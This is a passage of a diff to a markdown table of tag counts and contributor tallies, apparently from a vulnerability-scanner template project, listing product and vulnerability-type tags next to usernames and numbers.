e_schultze_ | 4 | | | | | | | -| zoho | 13 | 0w4ys | 3 | | | | | | | -| android | 13 | forgedhallpass | 3 | | | | | | | -| dlink | 13 | z3bd | 3 | | | | | | | -| jenkins | 12 | fyoorer | 3 | | | | | | | -| manageengine | 12 | johnjhacking | 3 | | | | | | | -| xxe | 11 | me9187 | 3 | | | | | | | -| magento | 11 | sullo | 3 | | | | | | | -| intrusive | 11 | andydoering | 3 | | | | | | | -| cve2013 | 11 | impramodsargar | 3 | | | | | | | -| dell | 10 | sushantkamble | 3 | | | | | | | -| hp | 10 | github.com/its0x08 | 3 | | | | | | | -| fastjson | 9 | binaryfigments | 3 | | | | | | | -| ftp | 9 | f1tz | 3 | | | | | | | -| vmware | 9 | dudez | 3 | | | | | | | -| gitlab | 9 | yash anand @yashanand155 | 3 | | | | | | | -| ibm | 9 | skeltavik | 3 | | | | | | | -| rails | 9 | idealphase | 3 | | | | | | | -| kubernetes | 9 | thomas_from_offensity | 3 | | | | | | | -| backup | 8 | _generic_human_ | 3 | | | | | | | +| zoho | 13 | tess | 4 | | | | | | | +| adobe | 13 | nodauf | 4 | | | | | | | +| android | 13 | sullo | 3 | | | | | | | +| dlink | 13 | forgedhallpass | 3 | | | | | | | +| dns | 13 | mavericknerd | 3 | | | | | | | +| manageengine | 12 | _0xf4n9x_ | 3 | | | | | | | +| jenkins | 12 | sushantkamble | 3 | | | | | | | +| cve2013 | 11 | z3bd | 3 | | | | | | | +| xxe | 11 | f1tz | 3 | | | | | | | +| intrusive | 11 | emenalf | 3 | | | | | | | +| magento | 11 | alifathi-h1 | 3 | | | | | | | +| hp | 10 | shifacyclewala | 3 | | | | | | | +| dell | 10 | thomas_from_offensity | 3 | | | | | | | +| ftp | 9 | johnjhacking | 3 | | | | | | | +| kubernetes | 9 | idealphase | 3 | | | | | | | +| gitlab | 9 | binaryfigments | 3 | | | | | | | +| rails | 9 | me9187 | 3 | | | | | | | +| vmware | 9 | _generic_human_ | 3 | | | | | | | +| fastjson | 9 | unstabl3 | 3 | | | | | | | +| ibm | 9 | impramodsargar | 3 | | | | | | | +| nginx | 8 | andydoering | 3 | | | | | | | +| ruijie | 8 | shine | 3 | | | | | | | +| microsoft | 8 | jarijaas | 3 | | | | | | | +| cnvd | 8 | dudez | 3 | | | | | | | +| backup | 8 | 0w4ys | 3 | | | | | | | +| airflow | 8 | fyoorer | 3 | | | | | | | +| scada | 8 | skeltavik | 3 | | | | | | | | cve2008 | 8 | vsh00t | 3 | | | | | | | -| nginx | 8 | emenalf | 3 | | | | | | | -| cnvd | 8 | alifathi-h1 | 3 | | | | | | | -| ruijie | 8 | jarijaas | 3 | | | | | | | -| airflow | 8 | shifacyclewala | 3 | | | | | | | -| microsoft | 8 | unstabl3 | 3 | | | | | | | -| scada | 8 | shine | 3 | | | | | | | -| coldfusion | 7 | mavericknerd | 3 | | | | | | | +| coldfusion | 7 | yash anand @yashanand155 | 3 | | | | | | | +| cms | 7 | github.com/its0x08 | 3 | | | | | | | +| confluence | 7 | parth | 2 | | | | | | | +| fileupload | 7 | g4l1t0 | 2 | | | | | | | +| solr | 7 | 0xsmiley | 2 | | | | | | | +| django | 7 | w4cky_ | 2 | | | | | | | +| netgear | 7 | alph4byt3 | 2 | | | | | | | +| files | 7 | huowuzhao | 2 | | | | | | | | camera | 7 | lotusdll | 2 | | | | | | | -| files | 7 | lark-lab | 2 | | | | | | | -| netgear | 7 | koti2 | 2 | | | | | | | -| django | 7 | bernardofsr | 2 | | | | | | | -| solr | 7 | 0xrudra | 2 | | | | | | | -| confluence | 7 | gal nagli | 2 | | | | | | | -| cms | 7 | its0x08 | 2 | | | | | | | -| laravel | 6 | g4l1t0 | 2 | | | | | | | -| sitecore | 6 | convisoappsec | 2 | | | | | | | -| citrix | 6 | joeldeleep | 2 | | | | | | | -| prometheus | 6 | 0xcrypto | 2 | | | | | | | -| api | 6 | sy3omda | 2 | | | | | | | -| docker | 6 | afaq | 2 | | | | | | | -| fileupload | 6 | foulenzer | 2 | | | | | | | -| lucee | 6 | 0xsmiley | 2 | | | | | | | -| phpmyadmin | 6 | _0xf4n9x_ | 2 | | | | | | | -| nodejs | 6 | alph4byt3 | 2 | | | | | | | -| jetty | 6 | parth | 2 | | | | | | | -| rconfig | 6 | whoever | 2 | | | | | | | -| drupal | 6 | arcc | 2 | | | | | | | -| jolokia | 5 | gevakun | 2 | | | | | | | -| java | 5 | 0xsapra | 2 | | | | | | | -| gocd | 5 | hetroublemakr | 2 | | | | | | | -| iis | 5 | bing0o | 2 | | | | | | | -| wso2 | 5 | amsda | 2 | | | | | | | -| windows | 5 | hahwul | 2 | | | | | | | -| dedecms | 5 | r12w4n | 2 | | | | | | | -| go | 5 | dheerajmadhukar | 2 | | | | | | | -| circarlife | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| symfony | 5 | socketz | 2 | | | | | | | -| printer | 5 | random-robbie | 2 | | | | | | | -| ssti | 5 | kiblyn11 | 2 | | | | | | | -| thinkphp | 5 | dahse89 | 2 | | | | | | | -| tomcat | 5 | huowuzhao | 2 | | | | | | | -| headless | 5 | martincodes-de | 2 | | | | | | | -| crlf | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| maps | 4 | ehsahil | 2 | | | | | | | -| fatpipe | 4 | swissky | 2 | | | | | | | -| git | 4 | ree4pwn | 2 | | | | | | | -| resin | 4 | manas_harsh | 2 | | | | | | | -| amazon | 4 | pxmme1337 | 2 | | | | | | | -| artifactory | 4 | udit_thakkur | 2 | | | | | | | -| rfi | 4 | w4cky_ | 2 | | | | | | | -| zabbix | 4 | zomsop82 | 2 | | | | | | | -| vpn | 4 | 0xelkomy | 2 | | | | | | | -| strapi | 4 | 0xprial | 2 | | | | | | | -| grafana | 4 | fabaff | 2 | | | | | | | -| bigip | 4 | bp0lr | 2 | | | | | | | -| symantec | 4 | davidmckennirey | 2 | | | | | | | -| npm | 4 | randomrobbie | 2 | | | | | | | -| zimbra | 4 | bsysop | 2 | | | | | | | +| prometheus | 6 | martincodes-de | 2 | | | | | | | +| nodejs | 6 | joeldeleep | 2 | | | | | | | +| phpmyadmin | 6 | 0xprial | 2 | | | | | | | +| jetty | 6 | bernardofsr | 2 | | | | | | | +| sitecore | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| rconfig | 6 | 0xcrypto | 2 | | | | | | | +| citrix | 6 | convisoappsec | 2 | | | | | | | +| laravel | 6 | its0x08 | 2 | | | | | | | +| lucee | 6 | ree4pwn | 2 | | | | | | | +| drupal | 6 | nkxxkn | 2 | | | | | | | +| docker | 6 | zomsop82 | 2 | | | | | | | +| api | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| tomcat | 5 | bsysop | 2 | | | | | | | +| crlf | 5 | dheerajmadhukar | 2 | | | | | | | +| jolokia | 5 | sy3omda | 2 | | | | | | | +| thinkphp | 5 | ehsahil | 2 | | | | | | | +| headless | 5 | 0xrudra | 2 | | | | | | | +| printer | 5 | 0xsapra | 2 | | | | | | | +| windows | 5 | whoever | 2 | | | | | | | +| symfony | 5 | arcc | 2 | | | | | | | +| grafana | 5 | amsda | 2 | | | | | | | +| circarlife | 5 | manas_harsh | 2 | | | | | | | +| iis | 5 | udit_thakkur | 2 | | | | | | | +| go | 5 | afaq | 2 | | | | | | | +| java | 5 | fabaff | 2 | | | | | | | +| dedecms | 5 | hahwul | 2 | | | | | | | +| wso2 | 5 | vavkamil | 2 | | | | | | | +| ssti | 5 | hetroublemakr | 2 | | | | | | | +| gocd | 5 | mohammedsaneem | 2 | | | | | | | +| enum | 4 | foulenzer | 2 | | | | | | | +| solarwinds | 4 | pxmme1337 | 2 | | | | | | | +| moodle | 4 | 0xelkomy | 2 | | | | | | | +| fatpipe | 4 | dahse89 | 2 | | | | | | | +| zimbra | 4 | r12w4n | 2 | | | | | | | +| zabbix | 4 | kiblyn11 | 2 | | | | | | | +| artifactory | 4 | koti2 | 2 | | | | | | | +| keycloak | 4 | lark-lab | 2 | | | | | | | +| amazon | 4 | swissky | 2 | | | | | | | +| thinkcmf | 4 | moritz nentwig | 2 | | | | | | | | firebase | 4 | cocxanh | 2 | | | | | | | -| traversal | 4 | x1m_martijn | 2 | | | | | | | -| magmi | 4 | nkxxkn | 2 | | | | | | | -| enum | 4 | mohammedsaneem | 2 | | | | | | | +| vpn | 4 | bing0o | 2 | | | | | | | +| resin | 4 | gal nagli | 2 | | | | | | | +| glpi | 4 | gevakun | 2 | | | | | | | +| slack | 4 | davidmckennirey | 2 | | | | | | | +| strapi | 4 | randomrobbie | 2 | | | | | | | +| git | 4 | socketz | 2 | | | | | | | | asp | 4 | r3naissance | 2 | | | | | | | -| hongdian | 4 | moritz nentwig | 2 | | | | | | | -| buffalo | 4 | vavkamil | 2 | | | | | | | -| wcs | 4 | willd96 | 1 | | | | | | | -| exchange | 4 | akshansh | 1 | | | | | | | -| solarwinds | 4 | yuansec | 1 | | | | | | | -| firmware | 4 | b0rn2r00t | 1 | | | | | | | -| microstrategy | 4 | push4d | 1 | | | | | | | -| moodle | 4 | nerrorsec | 1 | | | | | | | -| webserver | 4 | mah3sec_ | 1 | | | | | | | -| keycloak | 4 | s1r1u5_ | 1 | | | | | | | +| traversal | 4 | x1m_martijn | 2 | | | | | | | +| wcs | 4 | bp0lr | 2 | | | | | | | +| samsung | 4 | random-robbie | 2 | | | | | | | +| microstrategy | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | | elastic | 4 | exploitation | 1 | | | | | | | -| proxy | 4 | taielab | 1 | | | | | | | -| glpi | 4 | b0yd | 1 | | | | | | | -| slack | 4 | ldionmarcil | 1 | | | | | | | -| thinkcmf | 4 | luskabol | 1 | | | | | | | -| samsung | 4 | infosecsanyam | 1 | | | | | | | -| ebs | 3 | 0xteles | 1 | | | | | | | -| azure | 3 | 0h1in9e | 1 | | | | | | | -| openam | 3 | _c0wb0y_ | 1 | | | | | | | -| kafka | 3 | tirtha_mandal | 1 | | | | | | | -| nosqli | 3 | absshax | 1 | | | | | | | -| movable | 3 | deena | 1 | | | | | | | -| httpd | 3 | ajaysenr | 1 | | | | | | | -| tikiwiki | 3 | kre80r | 1 | | | | | | | -| sql | 3 | ratnadip gajbhiye | 1 | | | | | | | -| minio | 3 | iampritam | 1 | | | | | | | -| oa | 3 | b4uh0lz | 1 | | | | | | | -| cves | 3 | rodnt | 1 | | | | | | | -| telerik | 3 | regala_ | 1 | | | | | | | -| cve2007 | 3 | kurohost | 1 | | | | | | | -| jeesns | 3 | harshinsecurity | 1 | | | | | | | -| opensis | 3 | intx0x80 | 1 | | | | | | | -| ofbiz | 3 | kabirsuda | 1 | | | | | | | -| node | 3 | sec_hawk | 1 | | | | | | | -| log | 3 | aaron_costello | 1 | | | | | | | +| bigip | 4 | elouhi | 1 | | | | | | | +| maps | 4 | un-fmunozs | 1 | | | | | | | +| rfi | 4 | borna nematzadeh | 1 | | | | | | | +| firmware | 4 | knassar702 | 1 | | | | | | | +| npm | 4 | flag007 | 1 | | | | | | | +| exchange | 4 | cookiehanhoan | 1 | | | | | | | +| webserver | 4 | zandros0 | 1 | | | | | | | +| hongdian | 4 | nvn1729 | 1 | | | | | | | +| magmi | 4 | ldionmarcil | 1 | | | | | | | +| buffalo | 4 | b4uh0lz | 1 | | | | | | | +| symantec | 4 | 0xteles | 1 | | | | | | | +| proxy | 4 | tirtha_mandal | 1 | | | | | | | +| httpd | 3 | nerrorsec | 1 | | | | | | | +| fanruan | 3 | hanlaomo | 1 | | | | | | | +| mongodb | 3 | sec_hawk | 1 | | | | | | | +| cves | 3 | toufik airane | 1 | | | | | | | +| ebs | 3 | fmunozs | 1 | | | | | | | +| nosqli | 3 | aceseven (digisec360) | 1 | | | | | | | +| jeesns | 3 | izn0u | 1 | | | | | | | +| log | 3 | pudsec | 1 | | | | | | | +| cloud | 3 | _harleo | 1 | | | | | | | +| targa | 3 | jiheon-dev | 1 | | | | | | | +| tikiwiki | 3 | kaizensecurity | 1 | | | | | | | +| node | 3 | fq_hsu | 1 | | | | | | | +| jellyfin | 3 | bjhulst | 1 | | | | | | | +| azure | 3 | schniggie | 1 | | | | | | | +| vbulletin | 3 | 0h1in9e | 1 | | | | | | | +| telerik | 3 | rodnt | 1 | | | | | | | +| ssh | 3 | qlkwej | 1 | | | | | | | +| caucho | 3 | deena | 1 | | | | | | | +| terramaster | 3 | willd96 | 1 | | | | | | | +| hoteldruid | 3 | s1r1u5_ | 1 | | | | | | | +| cve2007 | 3 | lark lab | 1 | | | | | | | +| openam | 3 | geraldino2 | 1 | | | | | | | +| sql | 3 | daviey | 1 | | | | | | | +| kafka | 3 | 0xrod | 1 | | | | | | | +| mail | 3 | naglinagli | 1 | | | | | | | +| lfr | 3 | sickwell | 1 | | | | | | | +| itop | 3 | taielab | 1 | | | | | | | +| github | 3 | zhenwarx | 1 | | | | | | | +| ofbiz | 3 | d0rkerdevil | 1 | | | | | | | +| movable | 3 | shreyapohekar | 1 | | | | | | | +| linkerd | 3 | absshax | 1 | | | | | | | +| smtp | 3 | mass0ma | 1 | | | | | | | +| oa | 3 | x6263 | 1 | | | | | | | +| search | 3 | jrolf | 1 | | | | | | | +| bitrix | 3 | tim_koopmans | 1 | | | | | | | +| activemq | 3 | wabafet | 1 | | | | | | | +| r-seenet | 3 | b0yd | 1 | | | | | | | +| nacos | 3 | retr02332 | 1 | | | | | | | +| openssh | 3 | luskabol | 1 | | | | | | | +| exposures | 3 | pratik khalane | 1 | | | | | | | +| injection | 3 | affix | 1 | | | | | | | +| druid | 3 | apt-mirror | 1 | | | | | | | +| kibana | 3 | patralos | 1 | | | | | | | +| opensis | 3 | 0xh7ml | 1 | | | | | | | +| fpd | 3 | udyz | 1 | | | | | | | +| kevinlab | 3 | elmahdi | 1 | | | | | | | +| backdoor | 3 | yashanand155 | 1 | | | | | | | +| zhiyuan | 3 | lethargynavigator | 1 | | | | | | | +| sonicwall | 3 | bolli95 | 1 | | | | | | | +| springcloud | 3 | shelld3v | 1 | | | | | | | +| minio | 3 | alex | 1 | | | | | | | +| lansweeper | 3 | push4d | 1 | | | | | | | +| nexus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| cacti | 3 | notsoevilweasel | 1 | | | | | | | +| xxljob | 2 | manuelbua | 1 | | | | | | | +| lotus | 2 | whynotke | 1 | | | | | | | +| qihang | 2 | streetofhackerr007 | 1 | | | | | | | +| grav | 2 | micha3lb3n | 1 | | | | | | | +| cache | 2 | juicypotato1 | 1 | | | | | | | +| igs | 2 | sshell | 1 | | | | | | | +| rancher | 2 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| exposures | 3 | kba@sogeti_esec | 1 | | | | | | | -| kibana | 3 | bolli95 | 1 | | | | | | | -| terramaster | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| targa | 3 | chron0x | 1 | | | | | | | -| linkerd | 3 | clarkvoss | 1 | | | | | | | -| bitrix | 3 | akash.c | 1 | | | | | | | -| fpd | 3 | nvn1729 | 1 | | | | | | | -| backdoor | 3 | pdp | 1 | | | | | | | -| cacti | 3 | jeya seelan | 1 | | | | | | | -| vbulletin | 3 | andirrahmani1 | 1 | | | | | | | -| sonicwall | 3 | mesaglio | 1 | | | | | | | -| springcloud | 3 | aceseven (digisec360) | 1 | | | | | | | -| druid | 3 | rotemreiss | 1 | | | | | | | -| jellyfin | 3 | un-fmunozs | 1 | | | | | | | -| hoteldruid | 3 | kaizensecurity | 1 | | | | | | | -| injection | 3 | x6263 | 1 | | | | | | | -| r-seenet | 3 | berkdusunur | 1 | | | | | | | -| nacos | 3 | ooooooo_q | 1 | | | | | | | -| mongodb | 3 | bernardo rodrigues | 1 | | | | | | | +| jboss | 2 | husain | 1 | | | | | | | +| mailchimp | 2 | smaranchand | 1 | | | | | | | +| hikvision | 2 | ipanda | 1 | | | | | | | +| jsf | 2 | kareemse1im | 1 | | | | | | | +| commax | 2 | iampritam | 1 | | | | | | | +| ecology | 2 | ahmed sherif | 1 | | | | | | | +| harbor | 2 | imnightmaree | 1 | | | | | | | +| trixbox | 2 | blckraven | 1 | | | | | | | +| webcam | 2 | th3.d1p4k | 1 | | | | | | | +| bucket | 2 | pdp | 1 | | | | | | | +| ucmdb | 2 | soyelmago | 1 | | | | | | | +| sharepoint | 2 | ringo | 1 | | | | | | | +| glassfish | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| axis | 2 | petruknisme | 1 | | | | | | | +| middleware | 2 | kre80r | 1 | | | | | | | +| smb | 2 | alperenkesk | 1 | | | | | | | +| phpcollab | 2 | sbani | 1 | | | | | | | +| openfire | 2 | ooooooo_q | 1 | | | | | | | +| payara | 2 | harshinsecurity | 1 | | | | | | | +| liferay | 2 | igibanez | 1 | | | | | | | +| storage | 2 | berkdusunur | 1 | | | | | | | +| pega | 2 | c3l3si4n | 1 | | | | | | | +| embed | 2 | omarkurt | 1 | | | | | | | +| wordfence | 2 | intx0x80 | 1 | | | | | | | +| rocketchat | 2 | kurohost | 1 | | | | | | | +| jeedom | 2 | akash.c | 1 | | | | | | | +| tidb | 2 | chron0x | 1 | | | | | | | +| couchdb | 2 | clarkvoss | 1 | | | | | | | +| leak | 2 | kba@sogeti_esec | 1 | | | | | | | +| aviatrix | 2 | ajaysenr | 1 | | | | | | | +| heroku | 2 | andysvints | 1 | | | | | | | +| voipmonitor | 2 | makyotox | 1 | | | | | | | +| seeyon | 2 | j33n1k4 | 1 | | | | | | | +| hpe | 2 | hakluke | 1 | | | | | | | +| electron | 2 | thebinitghimire | 1 | | | | | | | +| idrac | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| vrealize | 2 | mubassirpatel | 1 | | | | | | | +| zeroshell | 2 | droberson | 1 | | | | | | | +| bruteforce | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| hjtcloud | 2 | luci | 1 | | | | | | | +| aruba | 2 | brabbit10 | 1 | | | | | | | +| wuzhicms | 2 | sicksec | 1 | | | | | | | +| backups | 2 | ratnadip gajbhiye | 1 | | | | | | | +| cve2005 | 2 | _c0wb0y_ | 1 | | | | | | | +| vcenter | 2 | ahmetpergamum | 1 | | | | | | | +| redis | 2 | @github.com/defr0ggy | 1 | | | | | | | +| hashicorp | 2 | dawid-czarnecki | 1 | | | | | | | +| yapi | 2 | orpheus | 1 | | | | | | | +| nextcloud | 2 | 0xd0ff9 | 1 | | | | | | | +| chiyu | 2 | nytr0gen | 1 | | | | | | | +| prtg | 2 | co0nan | 1 | | | | | | | +| netis | 2 | undefl0w | 1 | | | | | | | +| favicon | 2 | noamrathaus | 1 | | | | | | | +| justwriting | 2 | yavolo | 1 | | | | | | | +| flir | 2 | gboddin | 1 | | | | | | | +| upload | 2 | fopina | 1 | | | | | | | +| db | 2 | 52971 | 1 | | | | | | | +| hostheader-injection | 2 | furkansenan | 1 | | | | | | | +| spark | 2 | xstp | 1 | | | | | | | +| ecoa | 2 | mesaglio | 1 | | | | | | | +| fortios | 2 | yashgoti | 1 | | | | | | | +| myfactory | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| places | 2 | 0ut0fb4nd | 1 | | | | | | | +| phpstorm | 2 | florianmaak | 1 | | | | | | | +| axis2 | 2 | ilovebinbash | 1 | | | | | | | +| aspose | 2 | evolutionsec | 1 | | | | | | | +| paloalto | 2 | jteles | 1 | | | | | | | +| nagios | 2 | majidmc2 | 1 | | | | | | | +| chyrp | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| lansweeper | 3 | thevillagehacker | 1 | | | | | | | -| caucho | 3 | _darrenmartyn | 1 | | | | | | | -| lfr | 3 | yavolo | 1 | | | | | | | -| nexus | 3 | imnightmaree | 1 | | | | | | | -| github | 3 | florianmaak | 1 | | | | | | | -| kevinlab | 3 | shelld3v | 1 | | | | | | | -| openssh | 3 | makyotox | 1 | | | | | | | -| search | 3 | dawid-czarnecki | 1 | | | | | | | -| fanruan | 3 | d0rkerdevil | 1 | | | | | | | -| cloud | 3 | daviey | 1 | | | | | | | -| smtp | 3 | mhdsamx | 1 | | | | | | | -| mail | 3 | lethargynavigator | 1 | | | | | | | -| zhiyuan | 3 | knassar702 | 1 | | | | | | | -| itop | 3 | micha3lb3n | 1 | | | | | | | -| ssh | 3 | @github.com/defr0ggy | 1 | | | | | | | -| prestashop | 2 | wabafet | 1 | | | | | | | -| jetbrains | 2 | elmahdi | 1 | | | | | | | -| redis | 2 | oscarintherocks | 1 | | | | | | | -| aviatrix | 2 | zhenwarx | 1 | | | | | | | -| service | 2 | manuelbua | 1 | | | | | | | -| chyrp | 2 | apt-mirror | 1 | | | | | | | -| rancher | 2 | whynotke | 1 | | | | | | | -| embed | 2 | flag007 | 1 | | | | | | | -| justwriting | 2 | borna nematzadeh | 1 | | | | | | | -| favicon | 2 | naglinagli | 1 | | | | | | | -| geowebserver | 2 | ringo | 1 | | | | | | | -| huawei | 2 | nytr0gen | 1 | | | | | | | -| pega | 2 | 0xh7ml | 1 | | | | | | | -| hashicorp | 2 | smaranchand | 1 | | | | | | | -| dos | 2 | charanrayudu | 1 | | | | | | | -| ilo | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| spark | 2 | hanlaomo | 1 | | | | | | | -| nagios | 2 | toufik airane | 1 | | | | | | | -| wordfence | 2 | bad5ect0r | 1 | | | | | | | -| bypass | 2 | udyz | 1 | | | | | | | -| phpcollab | 2 | remonsec | 1 | | | | | | | -| idrac | 2 | 52971 | 1 | | | | | | | -| icewarp | 2 | ipanda | 1 | | | | | | | -| cache | 2 | bjhulst | 1 | | | | | | | -| sharepoint | 2 | 0xd0ff9 | 1 | | | | | | | -| bucket | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| spring | 2 | hakluke | 1 | | | | | | | -| myfactory | 2 | igibanez | 1 | | | | | | | -| ecology | 2 | 0xtavian | 1 | | | | | | | -| kentico | 2 | defr0ggy | 1 | | | | | | | -| status | 2 | pudsec | 1 | | | | | | | -| prtg | 2 | orpheus | 1 | | | | | | | -| chiyu | 2 | izn0u | 1 | | | | | | | -| paloalto | 2 | omarkurt | 1 | | | | | | | -| fortios | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| axis2 | 2 | geraldino2 | 1 | | | | | | | -| totemomail | 2 | 0ut0fb4nd | 1 | | | | | | | -| wuzhicms | 2 | yashanand155 | 1 | | | | | | | -| vcenter | 2 | jiheon-dev | 1 | | | | | | | -| mcafee | 2 | retr0 | 1 | | | | | | | -| heroku | 2 | mubassirpatel | 1 | | | | | | | -| oauth | 2 | undefl0w | 1 | | | | | | | -| horde | 2 | fopina | 1 | | | | | | | -| smb | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| nextjs | 2 | mass0ma | 1 | | | | | | | -| hostheader-injection | 2 | _harleo | 1 | | | | | | | -| chamilo | 2 | @dwisiswant0 | 1 | | | | | | | -| qihang | 2 | jteles | 1 | | | | | | | -| maian | 2 | qlkwej | 1 | | | | | | | -| ucmdb | 2 | adrianmf | 1 | | | | | | | -| storage | 2 | lark lab | 1 | | | | | | | -| grav | 2 | zandros0 | 1 | | | | | | | -| natshell | 2 | j33n1k4 | 1 | | | | | | | -| axis | 2 | ohlinge | 1 | | | | | | | -| python | 2 | juicypotato1 | 1 | | | | | | | -| aruba | 2 | soyelmago | 1 | | | | | | | -| netsweeper | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| yii | 2 | rojanrijal | 1 | | | | | | | -| bitly | 2 | blckraven | 1 | | | | | | | -| hikvision | 2 | petruknisme | 1 | | | | | | | -| adminer | 2 | brabbit10 | 1 | | | | | | | -| vrealize | 2 | patralos | 1 | | | | | | | -| text | 2 | schniggie | 1 | | | | | | | -| payara | 2 | retr02332 | 1 | | | | | | | -| yapi | 2 | sicksec | 1 | | | | | | | -| emerge | 2 | husain | 1 | | | | | | | -| avantfax | 2 | droberson | 1 | | | | | | | -| idea | 2 | gboddin | 1 | | | | | | | -| showdoc | 2 | yashgoti | 1 | | | | | | | -| xxljob | 2 | xstp | 1 | | | | | | | -| igs | 2 | alex | 1 | | | | | | | -| ec2 | 2 | ahmetpergamum | 1 | | | | | | | -| mailchimp | 2 | th3.d1p4k | 1 | | | | | | | -| shellshock | 2 | 0xrod | 1 | | | | | | | -| globalprotect | 2 | elouhi | 1 | | | | | | | -| openemr | 2 | raesene | 1 | | | | | | | -| activemq | 2 | ilovebinbash | 1 | | | | | | | -| db | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| akkadian | 2 | sbani | 1 | | | | | | | -| openvpn | 2 | noamrathaus | 1 | | | | | | | -| plesk | 2 | jrolf | 1 | | | | | | | -| splunk | 2 | affix | 1 | | | | | | | -| trixbox | 2 | evolutionsec | 1 | | | | | | | -| rockmongo | 2 | alperenkesk | 1 | | | | | | | -| webcam | 2 | aresx | 1 | | | | | | | -| waf | 2 | cookiehanhoan | 1 | | | | | | | -| cve2005 | 2 | becivells | 1 | | | | | | | -| phpstorm | 2 | revblock | 1 | | | | | | | -| couchdb | 2 | philippdelteil | 1 | | | | | | | -| s3 | 2 | kareemse1im | 1 | | | | | | | -| glassfish | 2 | fmunozs | 1 | | | | | | | -| mida | 2 | ahmed sherif | 1 | | | | | | | -| liferay | 2 | majidmc2 | 1 | | | | | | | -| hasura | 2 | thebinitghimire | 1 | | | | | | | -| commax | 2 | pratik khalane | 1 | | | | | | | -| tidb | 2 | luci | 1 | | | | | | | -| odoo | 2 | sickwell | 1 | | | | | | | -| ruby | 2 | streetofhackerr007 | 1 | | | | | | | -| rocketchat | 2 | shifacyclewla | 1 | | | | | | | -| getsimple | 2 | tim_koopmans | 1 | | | | | | | -| linkedin | 2 | notsoevilweasel | 1 | | | | | | | -| dolibarr | 2 | @ofjaaah | 1 | | | | | | | -| akamai | 2 | co0nan | 1 | | | | | | | -| qcubed | 2 | c3l3si4n | 1 | | | | | | | -| backups | 2 | andysvints | 1 | | | | | | | -| seeyon | 2 | elder tao | 1 | | | | | | | -| voipmonitor | 2 | sshell | 1 | | | | | | | -| openfire | 2 | furkansenan | 1 | | | | | | | -| flir | 2 | vzamanillo | 1 | | | | | | | -| jeedom | 2 | thezakman | 1 | | | | | | | -| upload | 2 | shreyapohekar | 1 | | | | | | | -| hjtcloud | 2 | | | | | | | | | -| guacamole | 2 | | | | | | | | | -| nextcloud | 2 | | | | | | | | | -| netis | 2 | | | | | | | | | -| electron | 2 | | | | | | | | | -| lotus | 2 | | | | | | | | | -| saltstack | 2 | | | | | | | | | -| leak | 2 | | | | | | | | | -| rstudio | 2 | | | | | | | | | -| bruteforce | 2 | | | | | | | | | -| frp | 2 | | | | | | | | | -| jsf | 2 | | | | | | | | | -| harbor | 2 | | | | | | | | | -| jboss | 2 | | | | | | | | | -| forcepoint | 2 | | | | | | | | | -| middleware | 2 | | | | | | | | | -| linux | 2 | | | | | | | | | -| kong | 2 | | | | | | | | | -| ecoa | 2 | | | | | | | | | +| adminer | 2 | akshansh | 1 | | | | | | | +| huawei | 2 | ohlinge | 1 | | | | | | | +| waf | 2 | shifacyclewla | 1 | | | | | | | +| kong | 2 | regala_ | 1 | | | | | | | +| mcafee | 2 | mah3sec_ | 1 | | | | | | | +| akamai | 2 | thevillagehacker | 1 | | | | | | | +| service | 2 | charanrayudu | 1 | | | | | | | +| globalprotect | 2 | retr0 | 1 | | | | | | | +| odoo | 2 | thezakman | 1 | | | | | | | +| openemr | 2 | oscarintherocks | 1 | | | | | | | +| yii | 2 | bad5ect0r | 1 | | | | | | | +| icewarp | 2 | infosecsanyam | 1 | | | | | | | +| geowebserver | 2 | b0rn2r00t | 1 | | | | | | | +| qcubed | 2 | elder tao | 1 | | | | | | | +| text | 2 | yuansec | 1 | | | | | | | +| nextjs | 2 | raesene | 1 | | | | | | | +| prestashop | 2 | jeya seelan | 1 | | | | | | | +| ruby | 2 | andirrahmani1 | 1 | | | | | | | +| ilo | 2 | adrianmf | 1 | | | | | | | +| showdoc | 2 | philippdelteil | 1 | | | | | | | +| oauth | 2 | 0xtavian | 1 | | | | | | | +| emerge | 2 | remonsec | 1 | | | | | | | +| forcepoint | 2 | @dwisiswant0 | 1 | | | | | | | +| plesk | 2 | becivells | 1 | | | | | | | +| totemomail | 2 | rotemreiss | 1 | | | | | | | +| bitly | 2 | _darrenmartyn | 1 | | | | | | | +| bypass | 2 | mhdsamx | 1 | | | | | | | +| openvpn | 2 | revblock | 1 | | | | | | | +| python | 2 | @ofjaaah | 1 | | | | | | | +| linux | 2 | vzamanillo | 1 | | | | | | | +| kentico | 2 | kabirsuda | 1 | | | | | | | +| guacamole | 2 | rojanrijal | 1 | | | | | | | +| netsweeper | 2 | defr0ggy | 1 | | | | | | | +| shellshock | 2 | aresx | 1 | | | | | | | +| spring | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| natshell | 2 | | | | | | | | | +| status | 2 | | | | | | | | | | sonarqube | 2 | | | | | | | | | -| hpe | 2 | | | | | | | | | -| zeroshell | 2 | | | | | | | | | +| getsimple | 2 | | | | | | | | | +| dos | 2 | | | | | | | | | +| s3 | 2 | | | | | | | | | +| saltstack | 2 | | | | | | | | | +| chamilo | 2 | | | | | | | | | +| horde | 2 | | | | | | | | | +| linkedin | 2 | | | | | | | | | +| ec2 | 2 | | | | | | | | | +| akkadian | 2 | | | | | | | | | +| splunk | 2 | | | | | | | | | +| frp | 2 | | | | | | | | | +| rockmongo | 2 | | | | | | | | | +| rstudio | 2 | | | | | | | | | +| idea | 2 | | | | | | | | | | 